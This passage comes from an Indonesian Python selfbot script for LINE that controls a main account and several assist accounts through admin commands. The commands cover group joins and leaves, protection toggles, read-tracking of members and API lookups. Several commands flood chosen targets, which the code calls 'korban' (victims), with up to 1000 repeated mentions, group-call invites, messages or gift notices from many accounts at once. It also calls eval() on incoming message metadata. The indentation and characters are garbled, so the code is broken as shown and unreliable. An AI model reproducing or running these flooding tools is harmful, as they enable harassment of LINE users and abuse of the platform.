elif cmd == "listprotect":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
md = ""
me = ""
mf = ""
a = 0
gid = protectqr
for group in gid:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectkick
for group in gid:
a = a + 1
end = '\n'
mb += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectjoin
for group in gid:
a = a + 1
end = '\n'
md += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectcancel
for group in gid:
a = a + 1
end = '\n'
mc += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectinvite
for group in gid:
a = a + 1
end = '\n'
me += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectantijs
for group in gid:
a = a + 1
end = '\n'
mf += str(a) + ". " +cl.getGroup(group).name + "\n"
cl.sendMessage(msg.to,"ãâââââ¦Famz_Protectionâ§ââââºã\n\nãâã PROTECT URL :\n"+ma+"\nãâã PROTECT KICK :\n"+mb+"\nãâã PROTECT JOIN :\n"+md+"\nãâã PROTECT CANCEL:\n"+mc+"\nãâã PROTECT INVITE:\n"+me+"\nãâã PROTECT ANTIJS :\n"+mf+"\nTotalã%sãGrup diamankan" %(str(len(protectqr)+len(protectkick)+len(protectjoin)+len(protectcancel)+len(protectinvite)+len(protectantijs))))
elif cmd == "respon":
if wait["selfbot"] == True:
if msg._from in admin:
ki.sendMessage(msg.to,responsename1)
kk.sendMessage(msg.to,responsename2)
kc.sendMessage(msg.to,responsename3)
km.sendMessage(msg.to,responsename4)
kb.sendMessage(msg.to,responsename5)
kn.sendMessage(msg.to,responsename6)
ko.sendMessage(msg.to,responsename7)
kw.sendMessage(msg.to,responsename8)
ke.sendMessage(msg.to,responsename9)
ky.sendMessage(msg.to,responsename10)
elif cmd == "invitebot":
if wait["selfbot"] == True:
if msg._from in admin:
try:
anggota = [Bmid,Cmid,Amid]
cl.inviteIntoGroup(msg.to, anggota)
ki.acceptGroupInvitation(msg.to)
kk.acceptGroupInvitation(msg.to)
kc.acceptGroupInvitation(msg.to)
except:
pass
elif cmd == "antijs stay":
if wait["selfbot"] == True:
if msg._from in admin:
try:
ginfo = cl.getGroup(msg.to)
cl.inviteIntoGroup(msg.to, [JSmid])
cl.sendMessage(msg.to,"Grup ã"+str(ginfo.name)+"ã Aman Dari JS")
except:
pass
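# joinall: temporarily open the group QR, let every assist bot join via a reissued
# ticket, then close the QR again from the last bot that joined.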
elif cmd == "joinall":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
km.acceptGroupInvitationByTicket(msg.to,Ticket)
kb.acceptGroupInvitationByTicket(msg.to,Ticket)
kn.acceptGroupInvitationByTicket(msg.to,Ticket)
ko.acceptGroupInvitationByTicket(msg.to,Ticket)
kw.acceptGroupInvitationByTicket(msg.to,Ticket)
ke.acceptGroupInvitationByTicket(msg.to,Ticket)
ky.acceptGroupInvitationByTicket(msg.to,Ticket)
G = ky.getGroup(msg.to)
G.preventedJoinByTicket = True
ky.updateGroup(G)
elif cmd == "byeall":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
ki.sendText(msg.to, "Bye bye fams "+str(G.name))
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
km.leaveGroup(msg.to)
kb.leaveGroup(msg.to)
kn.leaveGroup(msg.to)
ko.leaveGroup(msg.to)
kw.leaveGroup(msg.to)
ke.leaveGroup(msg.to)
ky.leaveGroup(msg.to)
elif cmd == "byeme":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
cl.sendText(msg.to, "Bye bye fams "+str(G.name))
cl.leaveGroup(msg.to)
elif cmd.startswith("leave "):
if msg._from in admin:
proses = text.split(" ")
ng = text.replace(proses[0] + " ","")
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
if h == ng:
ki.sendMessage(i, "Silahkan admin invite atau masukan kembali")
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
km.leaveGroup(i)
kb.leaveGroup(i)
kn.leaveGroup(i)
ko.leaveGroup(i)
kw.leaveGroup(i)
ke.leaveGroup(i)
ky.leaveGroup(i)
cl.sendMessage(to,"Berhasil keluar dari grup " +h)
elif cmd == "assist1":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = ki.getGroup(msg.to)
G.preventedJoinByTicket = True
ki.updateGroup(G)
elif cmd == "assist2":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kk.getGroup(msg.to)
G.preventedJoinByTicket = True
kk.updateGroup(G)
elif cmd == "assist3":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kc.getGroup(msg.to)
G.preventedJoinByTicket = True
kc.updateGroup(G)
elif cmd == "assist4":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
km.acceptGroupInvitationByTicket(msg.to,Ticket)
G = km.getGroup(msg.to)
G.preventedJoinByTicket = True
km.updateGroup(G)
elif cmd == "assist5":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kb.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kb.getGroup(msg.to)
G.preventedJoinByTicket = True
kb.updateGroup(G)
elif cmd == "assist6":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kn.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kn.getGroup(msg.to)
G.preventedJoinByTicket = True
kn.updateGroup(G)
elif cmd == "assist7":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ko.acceptGroupInvitationByTicket(msg.to,Ticket)
G = ko.getGroup(msg.to)
G.preventedJoinByTicket = True
ko.updateGroup(G)
elif cmd == "assist8":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kw.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kw.getGroup(msg.to)
G.preventedJoinByTicket = True
kw.updateGroup(G)
elif cmd == "assist9":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ke.acceptGroupInvitationByTicket(msg.to,Ticket)
G = ke.getGroup(msg.to)
G.preventedJoinByTicket = True
ke.updateGroup(G)
elif cmd == "assist10":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ky.acceptGroupInvitationByTicket(msg.to,Ticket)
G = ky.getGroup(msg.to)
G.preventedJoinByTicket = True
ky.updateGroup(G)
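# assist1..assist10 are identical apart from which client joins. A compact alternative
# (a sketch, assuming the assist clients were kept in a list) could be:
#   for bot in [ki, kk, kc, km, kb, kn, ko, kw, ke, ky]:
#       bot.acceptGroupInvitationByTicket(msg.to, Ticket)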
elif cmd == "ghost join":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
sw.acceptGroupInvitationByTicket(msg.to,Ticket)
sx.acceptGroupInvitationByTicket(msg.to,Ticket)
js.acceptGroupInvitationByTicket(msg.to,Ticket)
G = js.getGroup(msg.to)
G.preventedJoinByTicket = True
js.updateGroup(G)
elif cmd == "ghost bye":
if msg._from in admin:
G = cl.getGroup(msg.to)
sw.leaveGroup(msg.to)
sx.leaveGroup(msg.to)
js.leaveGroup(msg.to)
elif cmd == "sprespon":
if wait["selfbot"] == True:
if msg._from in admin:
get_profile_time_start = time.time()
get_profile = cl.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_group_time_start = time.time()
get_group = cl.getGroupIdsJoined()
get_group_time = time.time() - get_group_time_start
get_contact_time_start = time.time()
get_contact = cl.getContact(mid)
get_contact_time = time.time() - get_contact_time_start
cl.sendMessage(msg.to, "Speed respon\n\n - Get Profile\n %.10f\n - Get Contact\n %.10f\n - Get Group\n %.10f" % (get_profile_time/3,get_contact_time/3,get_group_time/3))
elif cmd == "speed" or cmd == "sp":
if wait["selfbot"] == True:
if msg._from in admin:
start = time.time()
cl.sendMessage(msg.to, "ngebut bozzz...")
elapsed_time = time.time() - start
cl.sendMessage(msg.to, "{} detik".format(str(elapsed_time)))
elif cmd == "lurking on":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
Setmain['ARreadPoint'][msg.to] = msg_id
Setmain['ARreadMember'][msg.to] = {}
cl.sendText(msg.to, "Lurking berhasil diaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "lurking off":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
del Setmain['ARreadPoint'][msg.to]
del Setmain['ARreadMember'][msg.to]
cl.sendText(msg.to, "Lurking berhasil dinoaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "lurkers":
if msg._from in admin:
if msg.to in Setmain['ARreadPoint']:
if Setmain['ARreadMember'][msg.to] != {}:
aa = []
for x in Setmain['ARreadMember'][msg.to]:
aa.append(x)
try:
arrData = ""
textx = " [ Result {} member ] \n\n [ Lurkers ]\n1. ".format(str(len(aa)))
arr = []
no = 1
b = 1
for i in aa:
b = b + 1
end = "\n"
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
textx += mention
if no < len(aa):
no += 1
textx += str(b) + ". "
else:
try:
no = "[ {} ]".format(str(cl.getGroup(msg.to).name))
except:
no = " "
msg.to = msg.to
msg.text = textx+"\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"
msg.contentMetadata = {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}
msg.contentType = 0
cl.sendMessage1(msg)
except:
pass
try:
del Setmain['ARreadPoint'][msg.to]
del Setmain['ARreadMember'][msg.to]
except:
pass
Setmain['ARreadPoint'][msg.to] = msg.id
Setmain['ARreadMember'][msg.to] = {}
else:
cl.sendText(msg.to, "User kosong...")
else:
cl.sendText(msg.to, "Ketik lurking on dulu")
elif cmd == "sider on":
if wait["selfbot"] == True:
if msg._from in admin:
try:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cl.sendMessage(msg.to, "Cek sider diaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
except:
pass
cctv['point'][msg.to] = msg.id
cctv['sidermem'][msg.to] = ""
cctv['cyduk'][msg.to]=True
elif cmd == "sider off":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.to in cctv['point']:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cctv['cyduk'][msg.to]=False
cl.sendMessage(msg.to, "Cek sider dinonaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
else:
cl.sendMessage(msg.to, "Sudak tidak aktif")
#===========Hiburan============#
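# Entertainment/utility commands: these call third-party HTTP APIs (corrykalam.net,
# xeonwz.ga, a joox proxy, YouTube scraping) and only work while those endpoints are reachable.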
elif cmd.startswith("sholat: "):
if msg._from in admin:
sep = text.split(" ")
location = text.replace(sep[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apisholat.php?lokasi={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
if data[1] != "Subuh : " and data[2] != "Dzuhur : " and data[3] != "Ashar : " and data[4] != "Maghrib : " and data[5] != "Isha : ":
ret_ = "ãJadwal Sholatã"
ret_ += "\nâ§Lokasi : " + data[0]
ret_ += "\nâ§" + data[1]
ret_ += "\nâ§" + data[2]
ret_ += "\nâ§" + data[3]
ret_ += "\nâ§" + data[4]
ret_ += "\nâ§" + data[5]
ret_ += "\n\nTanggal : " + datetime.strftime(timeNow,'%Y-%m-%d')
ret_ += "\nJam : " + datetime.strftime(timeNow,'%H:%M:%S')
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("cuaca: "):
if msg._from in admin:
separate = text.split(" ")
location = text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apicuaca.php?kota={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
if "result" not in data:
ret_ = "ãStatus Cuacaã"
ret_ += "\nâ§Lokasi : " + data[0].replace("Temperatur di kota ","")
ret_ += "\nâ§Suhu : " + data[1].replace("Suhu : ","") + " C"
ret_ += "\nâ§Kelembaban : " + data[2].replace("Kelembaban : ","") + " %"
ret_ += "\nâ§Tekanan udara : " + data[3].replace("Tekanan udara : ","") + " HPa"
ret_ += "\nâ§Kecepatan angin : " + data[4].replace("Kecepatan angin : ","") + " m/s"
ret_ += "\n\nTanggal : " + datetime.strftime(timeNow,'%Y-%m-%d')
ret_ += "\nJam : " + datetime.strftime(timeNow,'%H:%M:%S')
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("lokasi: "):
if msg._from in admin:
separate = msg.text.split(" ")
location = msg.text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apiloc.php?lokasi={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
if data[0] != "" and data[1] != "" and data[2] != "":
link = "https://www.google.co.id/maps/@{},{},15z".format(str(data[1]), str(data[2]))
ret_ = "ãInfo Lokasiã"
ret_ += "\nâ§Location : " + data[0]
ret_ += "\nâ§Google Maps : " + link
else:
ret_ = "[Details Location] Error : Location not found"
cl.sendMessage(msg.to,str(ret_))
elif cmd.startswith("lirik: "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
params = {'songname': search}
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("https://ide.fdlrcn.com/workspace/yumi-apis/joox?{}".format(urllib.parse.urlencode(params)))
try:
data = json.loads(r.text)
for song in data:
songs = song[5]
lyric = songs.replace('ti:','Title - ')
lyric = lyric.replace('ar:','Artist - ')
lyric = lyric.replace('al:','Album - ')
removeString = "[1234567890.:]"
for char in removeString:
lyric = lyric.replace(char,'')
ret_ = "âââ[ Lyric ]"
ret_ += "\nâ Nama lagu : {}".format(str(song[0]))
ret_ += "\nâ Durasi : {}".format(str(song[1]))
ret_ += "\nâ Link : {}".format(str(song[3]))
ret_ += "\nâââ[ Finish ]\n\nLirik nya :\n{}".format(str(lyric))
cl.sendText(msg.to, str(ret_))
except:
cl.sendText(to, "Lirik tidak ditemukan")
elif cmd.startswith("music: "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
params = {'songname': search}
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("https://ide.fdlrcn.com/workspace/yumi-apis/joox?{}".format(urllib.parse.urlencode(params)))
try:
data = json.loads(r.text)
for song in data:
ret_ = "âââ[ Music ]"
ret_ += "\nâ Nama lagu : {}".format(str(song[0]))
ret_ += "\nâ Durasi : {}".format(str(song[1]))
ret_ += "\nâ Link : {}".format(str(song[3]))
ret_ += "\nâââ[ Waiting Audio ]"
cl.sendText(msg.to, str(ret_))
cl.sendText(msg.to, "Mohon bersabar musicnya lagi di upload")
cl.sendAudioWithURL(msg.to, song[3])
except:
cl.sendText(to, "Musik tidak ditemukan")
elif cmd.startswith("gimage: "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
url = "https://api.xeonwz.ga/api/image/google?q={}".format(urllib.parse.quote(search))
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get(url)
data = r.text
data = json.loads(data)
if data["data"] != []:
start = timeit.timeit()
items = data["data"]
path = random.choice(items)
a = items.index(path)
b = len(items)
cl.sendText(msg.to,"ãGoogle Imageã\nType : Search Image\nTime taken : %seconds" % (start))
cl.sendImageWithURL(msg.to, str(path))
elif cmd.startswith("ytmp4: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
best = vid.getbest()
best.resolution, best.extension
for s in stream:
me = best.url
hasil = ""
title = "Judul [ " + vid.title + " ]"
author = '\n\n➧Author : ' + str(vid.author)
durasi = '\n➧Duration : ' + str(vid.duration)
suka = '\n➧Likes : ' + str(vid.likes)
rating = '\n➧Rating : ' + str(vid.rating)
deskripsi = '\n➧Deskripsi : ' + str(vid.description)
cl.sendVideoWithURL(msg.to, me)
cl.sendText(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
except Exception as e:
cl.sendText(msg.to,str(e))
elif cmd.startswith("ytmp3: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
bestaudio = vid.getbestaudio()
bestaudio.bitrate
best = vid.getbest()
best.resolution, best.extension
for s in stream:
shi = bestaudio.url
me = best.url
vin = s.url
hasil = ""
title = "Judul [ " + vid.title + " ]"
author = '\n\n➧Author : ' + str(vid.author)
durasi = '\n➧Duration : ' + str(vid.duration)
suka = '\n➧Likes : ' + str(vid.likes)
rating = '\n➧Rating : ' + str(vid.rating)
deskripsi = '\n➧Deskripsi : ' + str(vid.description)
cl.sendImageWithURL(msg.to, me)
cl.sendAudioWithURL(msg.to, shi)
cl.sendText(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
except Exception as e:
cl.sendText(msg.to,str(e))
elif cmd.startswith("profileig: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
instagram = msg.text.replace(sep[0] + " ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "â§Link : " + "https://www.instagram.com/" + instagram
text = "â§Name : "+namaIG+"\nâ§Username : "+usernameIG+"\nâ§Biography : "+bioIG+"\nâ§Follower : "+followerIG+"\nâ§Following : "+followIG+"\nâ§Post : "+mediaIG+"\nâ§Verified : "+verifIG+"\nâ§Private : "+privateIG+"" "\n" + link
cl.sendImageWithURL(msg.to, profileIG)
cl.sendMessage(msg.to, str(text))
except Exception as e:
cl.sendMessage(msg.to, str(e))
elif cmd.startswith("cekdate: "):
if msg._from in admin:
sep = msg.text.split(" ")
tanggal = msg.text.replace(sep[0] + " ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendMessage(msg.to,"â§I N F O R M A S I â§\n\n"+"â§Date Of Birth : "+lahir+"\nâ§Age : "+usia+"\nâ§Ultah : "+ultah+"\nâ§Zodiak : "+zodiak)
elif cmd.startswith("jumlah: "):
if wait["selfbot"] == True:
if msg._from in admin:
proses = text.split(":")
strnum = text.replace(proses[0] + ":","")
num = int(strnum)
Setmain["ARlimit"] = num
cl.sendText(msg.to,"Total Spamtag Diubah Menjadi " +strnum)
elif cmd.startswith("spamcall: "):
if wait["selfbot"] == True:
if msg._from in admin:
proses = text.split(":")
strnum = text.replace(proses[0] + ":","")
num = int(strnum)
wait["limit"] = num
cl.sendText(msg.to,"Total Spamcall Diubah Menjadi " +strnum)
elif cmd.startswith("spamtag "):
if wait["selfbot"] == True:
if msg._from in admin:
if 'MENTION' in msg.contentMetadata.keys():
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
zx = ""
zxc = " "
zx2 = []
pesan2 = "@a"" "
xlen = str(len(zxc))
xlen2 = str(len(zxc)+len(pesan2)-1)
zx = {'S':xlen, 'E':xlen2, 'M':key1}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
msg.text = zxc
lol = {'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
msg.contentMetadata = lol
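# Note (added comment, my reading of the code above): the LINE mention metadata maps the
# "@a" placeholder inside msg.text to the target user; 'S'/'E' are the start/end character
# offsets of that placeholder in the message text and 'M' is the mentioned user's mid, with
# the whole list serialized as JSON under the 'MENTIONEES' key.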
jmlh = int(Setmain["ARlimit"])
if jmlh <= 1000:
for x in range(jmlh):
try:
cl.sendMessage1(msg)
except Exception as e:
cl.sendText(msg.to,str(e))
else:
cl.sendText(msg.to,"Jumlah melebihi 1000")
elif cmd == "spamcall":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
group = cl.getGroup(to)
members = [mem.mid for mem in group.members]
jmlh = int(wait["limit"])
cl.sendMessage(msg.to, "Berhasil mengundang {} undangan Call Grup".format(str(wait["limit"])))
if jmlh <= 1000:
for x in range(jmlh):
try:
call.acquireGroupCallRoute(to)
call.inviteIntoGroupCall(to, contactIds=members)
except Exception as e:
cl.sendText(msg.to,str(e))
else:
cl.sendText(msg.to,"Jumlah melebihi batas")
elif 'Gift: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
korban = msg.text.replace('Gift: ','')
korban2 = korban.split()
midd = korban2[0]
jumlah = int(korban2[1])
if jumlah <= 1000:
for var in range(0,jumlah):
cl.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
ki.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
kk.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
kc.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
elif 'Spam: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
korban = msg.text.replace('Spam: ','')
korban2 = korban.split()
midd = korban2[0]
jumlah = int(korban2[1])
if jumlah <= 1000:
for var in range(0,jumlah):
cl.sendMessage(midd, str(Setmain["ARmessage1"]))
ki.sendMessage(midd, str(Setmain["ARmessage1"]))
kk.sendMessage(midd, str(Setmain["ARmessage1"]))
kc.sendMessage(midd, str(Setmain["ARmessage1"]))
km.sendMessage(midd, str(Setmain["ARmessage1"]))
kb.sendMessage(midd, str(Setmain["ARmessage1"]))
kn.sendMessage(midd, str(Setmain["ARmessage1"]))
ko.sendMessage(midd, str(Setmain["ARmessage1"]))
cw.sendMessage(midd, str(Setmain["ARmessage1"]))
ke.sendMessage(midd, str(Setmain["ARmessage1"]))
ky.sendMessage(midd, str(Setmain["ARmessage1"]))
elif 'ID line: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
msgs = msg.text.replace('ID line: ','')
conn = cl.findContactsByUserid(msgs)
if True:
cl.sendMessage(msg.to, "http://line.me/ti/p/~" + msgs)
cl.sendMessage(msg.to, None, contentMetadata={'mid': conn.mid}, contentType=13)
#===========Protection============#
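# Note (added comment): the handlers below toggle per-group protections by adding or removing
# the group id (msg.to) from the in-memory lists (welcome, protectqr, protectkick,
# protectinvite, protectjoin, protectcancel, protectantijs, ghost). The enforcement itself
# presumably happens elsewhere in the bot where those lists are checked.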
elif 'Welcome ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Welcome ','')
if spl == 'on':
if msg.to in welcome:
msgs = "Welcome Msg sudah aktif"
else:
welcome.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Welcome Msg diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "ãDiaktifkanã\n" + msgs)
elif spl == 'off':
if msg.to in welcome:
welcome.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Welcome Msg dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Welcome Msg sudah tidak aktif"
cl.sendMessage(msg.to, "ãDinonaktifkanã\n" + msgs)
elif 'Protecturl ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protecturl ','')
if spl == 'on':
if msg.to in protectqr:
msgs = "Protect url sudah aktif"
else:
protectqr.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect url diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "ãDiaktifkanã\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect url dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect url sudah tidak aktif"
cl.sendMessage(msg.to, "ãDinonaktifkanã\n" + msgs)
elif 'Protectkick ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectkick ','')
if spl == 'on':
if msg.to in protectkick:
msgs = "Protect kick sudah aktif"
else:
protectkick.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect kick diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "ãDiaktifkanã\n" + msgs)
elif spl == 'off':
if msg.to in protectkick:
protectkick.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect kick dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect kick sudah tidak aktif"
cl.sendMessage(msg.to, "ãDinonaktifkanã\n" + msgs)
elif 'Protectinvite ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectinvite ','')
if spl == 'on':
if msg.to in protectinvite:
